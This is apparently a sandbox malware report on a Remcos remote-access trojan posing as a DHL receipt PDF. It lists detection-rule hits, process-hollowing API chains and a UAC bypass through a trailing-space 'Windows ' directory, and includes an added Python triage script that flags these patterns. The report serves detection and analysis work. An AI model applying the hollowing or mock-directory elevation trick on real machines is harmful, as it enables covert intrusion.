Source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000002C.00000002.2045539948.000000003357B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000029.00000002.1972241496.0000000033A1B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: initial sampleStatic PE information: Filename: DHL119040 receipt document,pdf.exe
              Source: initial sampleStatic PE information: Filename: DHL119040 receipt document,pdf.exe
              Source: C:\ProgramData\Remcos\remcos.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B81B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_028B81B8
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BC7B4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_028BC7B4
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BC724 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_028BC724
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7A94 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,0_2_028B7A94
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BDA24 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,0_2_028BDA24
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BC898 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_028BC898
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BD9A4 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,0_2_028BD9A4
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7944 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_028B7944
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_028B7CC8
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B81B6 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_028B81B6
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BC6AC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_028BC6AC
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BC7B2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_028BC7B2
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7A92 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,0_2_028B7A92
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7942 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_028B7942
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA5BB35 OpenProcess,NtResumeProcess,CloseHandle,0_2_2DA5BB35
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA5BB09 OpenProcess,NtSuspendProcess,CloseHandle,0_2_2DA5BB09
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA532D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,0_2_2DA532D2
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028F7A94 NtWriteVirtualMemory,5_2_028F7A94
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028FDA24 NtQueryInformationProcess,5_2_028FDA24
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028FC898 NtOpenFile,NtReadFile,5_2_028FC898
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028FD9A4 NtQueryInformationProcess,5_2_028FD9A4
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028F7944 NtAllocateVirtualMemory,5_2_028F7944
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028F7A92 NtWriteVirtualMemory,5_2_028F7A92
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028F7942 NtAllocateVirtualMemory,5_2_028F7942
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5BD58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,5_2_2D5BD58F
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5B80EF CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,5_2_2D5B80EF
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5BBB09 OpenProcess,NtSuspendProcess,CloseHandle,5_2_2D5BBB09
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5BBB35 OpenProcess,NtResumeProcess,CloseHandle,5_2_2D5BBB35
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5B32D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,5_2_2D5B32D2
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C89E4 NtQueryInformationToken,NtQueryInformationToken,7_2_00007FF7689C89E4
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689E1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,7_2_00007FF7689E1538
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,7_2_00007FF7689B3D94
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C898C NtQueryInformationToken,7_2_00007FF7689C898C
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,7_2_00007FF7689C7FF8
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,7_2_00007FF7689C88C0
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,7_2_00007FF7689C8114
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689DBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,7_2_00007FF7689DBCF0
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C89E4 NtQueryInformationToken,NtQueryInformationToken,8_2_00007FF7689C89E4
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689E1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,8_2_00007FF7689E1538
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,8_2_00007FF7689B3D94
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C898C NtQueryInformationToken,8_2_00007FF7689C898C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,8_2_00007FF7689C7FF8
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,8_2_00007FF7689C88C0
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,8_2_00007FF7689C8114
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689DBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,8_2_00007FF7689DBCF0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C89E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF7689C89E4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689E1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF7689E1538
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF7689B3D94
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C898C NtQueryInformationToken
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689DBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF319890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00401806 NtdllDefWindowProc_W
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_004018C0 NtdllDefWindowProc_W
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B5240 memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028B81B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA567B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5B67B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Users\Public\alpha.exe | File created: C:\Windows  (the directory name is "Windows " with a trailing space: a mock trusted directory; the trailing space is stripped when Windows normalises the path, so a binary placed under it can pass the auto-elevation path check)
Source: C:\Users\Public\alpha.exe | File created: C:\Windows \System32
Source: C:\Windows\System32\extrac32.exe | File created: C:\Windows \System32\per.exe
Source: C:\Users\Public\alpha.exe | File deleted: C:\Windows \System32
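Two of the entries above carry most of the triage value: the call chain at 0_2_028B81B8 (CreateProcessAsUserW, GetThreadContext, NtUnmapViewOfSection, NtWriteVirtualMemory, SetThreadContext, NtResumeThread is the classic process-hollowing sequence) and the files dropped under C:\Windows \System32, where the "Windows " component carries a trailing space so that a normalising path check treats it as the real system directory. The Python below is an added example, not code from the Joe Sandbox report or from the sample; it parses a handful of report-style lines (constructed here, in the cleaned form used on this page) and flags both patterns. The line formats, the "|" separator and the chain definition are the example's own assumptions.

```python
"""Added triage helper for Joe Sandbox report lines (not part of the report).

Flags two things in "Code function" / "File created" entries:
  * the ordered API chain of process hollowing (RunPE), and
  * paths that pass through a mock trusted directory, i.e. a directory name
    with trailing whitespace such as "C:\\Windows \\System32".
"""
import re
from typing import List, Optional, Tuple

# Ordered chain expected in a hollowing routine; each entry is matched as a
# prefix so CreateProcessA/W/AsUserW all count. Other calls may sit between.
HOLLOWING_CHAIN = (
    "CreateProcess",
    "GetThreadContext",
    "NtUnmapViewOfSection",
    "NtWriteVirtualMemory",
    "SetThreadContext",
    "NtResumeThread",
)

# Line formats assumed by this example (the cleaned form used on this page;
# the fused "alpha.exeCode function:" form of the raw export also matches).
CODE_FUNC_RE = re.compile(
    r"Source: (?P<src>.+?)\s*\|?\s*Code function: (?P<fid>\d+_\d+_[0-9A-Fa-f]+):?\s*(?P<apis>.*)$"
)
FILE_RE = re.compile(
    r"Source: (?P<src>.+?)\s*\|?\s*File (?P<op>created|deleted): (?P<path>.*)$"
)
FUNC_ID_RE = re.compile(r"\d+_\d+_[0-9A-Fa-f]+")


def parse_apis(field: str) -> List[str]:
    """Split the comma-separated call list; drop the trailing repeat of the
    function id that the report's 'Jump to' link text leaves behind."""
    return [t.strip() for t in field.split(",")
            if t.strip() and not FUNC_ID_RE.fullmatch(t.strip())]


def matches_chain(apis: List[str], chain=HOLLOWING_CHAIN) -> bool:
    """True when every element of `chain` appears in `apis` in that order."""
    i = 0
    for api in apis:
        if i < len(chain) and api.startswith(chain[i]):
            i += 1
    return i == len(chain)


def mock_trusted_dir(path: str) -> Optional[str]:
    """Return the first path component that differs from its stripped form
    (e.g. 'Windows ' in 'C:\\Windows \\System32\\per.exe'), else None.
    NTFS keeps such a name distinct from the real directory, but code that
    normalises the path before checking it can mistake it for a trusted one."""
    for comp in path.split("\\"):
        if comp.strip() and comp != comp.strip():
            return comp
    return None


def triage(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (finding, source, detail) tuples for the lines given."""
    findings = []
    for line in lines:
        m = CODE_FUNC_RE.search(line)
        if m and matches_chain(parse_apis(m.group("apis"))):
            findings.append(("process_hollowing", m.group("src"), m.group("fid")))
            continue
        m = FILE_RE.search(line)
        if m and mock_trusted_dir(m.group("path")) is not None:
            findings.append(("mock_trusted_dir", m.group("src"),
                             m.group("op") + ": " + m.group("path")))
    return findings


# Constructed sample lines in the style of the report entries above.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028B81B8 "
    "CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,"
    "NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,"
    "Wow64SetThreadContext,NtResumeThread,0_2_028B81B8",
    r"Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C88C0 "
    "NtOpenThreadToken,NtOpenProcessToken,NtClose",
    r"Source: C:\Users\Public\alpha.exe | File created: C:\Windows ",
    r"Source: C:\Users\Public\alpha.exe | File created: C:\Windows \System32",
    r"Source: C:\Windows\System32\extrac32.exe | File created: C:\Windows \System32\per.exe",
    r"Source: C:\Users\Public\alpha.exe | File created: C:\Users\Public\ger.exe",
]

if __name__ == "__main__":
    for kind, src, detail in triage(SAMPLE_LINES):
        print(f"{kind:18} {src} -> {detail}")
```

The chain match is an ordered subsequence, not a contiguous one, because the sandbox lists every call the function makes (Wow64GetThreadContext and NtReadVirtualMemory sit between the steps in the entry above); a contiguous match would miss exactly the real-world variant shown on this page.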
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028A20C4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA77D33
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA76FEA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA53FCA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA7DE9D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA66E0E
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA75E5E
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA8D9C9
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA73946
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA778FE
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA67BAF
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA5DB62
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA67A46
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA7E558
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA774E6
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA78770
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA861F0
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA78168
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA94159
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA5F0FA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA7E0CC
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA6739D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA9332B
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA7E2FB
Source: C:\Users\Public\Libraries\yfkwifxL.pif | Code function: 1_2_0040E800
Source: C:\Users\Public\Libraries\yfkwifxL.pif | Code function: 1_2_0040C838
Source: C:\Users\Public\Libraries\yfkwifxL.pif | Code function: 1_2_0040F1CA
Source: C:\Users\Public\Libraries\yfkwifxL.pif | Code function: 1_2_00411250
Source: C:\Users\Public\Libraries\yfkwifxL.pif | Code function: 1_2_004102D0
Source: C:\Users\Public\Libraries\yfkwifxL.pif | Code function: 1_2_0040B2E7
Source: C:\Users\Public\Libraries\yfkwifxL.pif | Code function: 1_2_004102F0
Source: C:\Users\Public\Libraries\yfkwifxL.pif | Code function: 1_2_004105F0
Source: C:\Users\Public\Libraries\yfkwifxL.pif | Code function: 1_2_00410673
Source: C:\Users\Public\Libraries\yfkwifxL.pif | Code function: 1_2_004106B9
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_45BD7194
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_45BCB5C1
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_028E20C4
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5BDB62
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5DE558
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5D74E6
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5D6FEA
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5D5E5E
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5DDE9D
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5D3946
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5E61F0
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5DE0CC
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5D78FE
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5F332B
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5DE2FB
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689C5554
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B7D30
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689BAA54
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689C37D8
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689DD9D0
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B81D4
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B8DF8
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689BCE10
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689D7F00
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B6EE4
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B5240
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689BD250
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B9E50
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B7650
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B2220
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689C4224
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B4A30
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689DAA30
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689BE680
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689DEE88
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689C0A6C
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689DAFBC
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B3410
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B6BE0
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B9B50
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B372C
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B3F90
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B5B70
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689C18D4
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B8510
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689BB0D8
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689C7854
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689DAC4C
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B2C48
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B1884
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689C5554
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B7D30
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689BAA54
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689C37D8
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689DD9D0
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B81D4
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B8DF8
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689BCE10
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689D7F00
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B6EE4
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B5240
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689BD250
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B9E50
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B7650
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B2220
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689C4224
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B4A30
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689DAA30
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689BE680
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689DEE88
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689C0A6C
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689DAFBC
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B3410
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B6BE0
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B9B50
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B372C
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B3F90
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B5B70
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689C18D4
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B8510
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689BB0D8
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689C7854
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689DAC4C
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B2C48
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B1884
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C5554
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689BAA54
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C4224
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C0A6C
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C37D8
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689DD9D0
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B81D4
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B8DF8
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689BCE10
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B7D30
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689D7F00
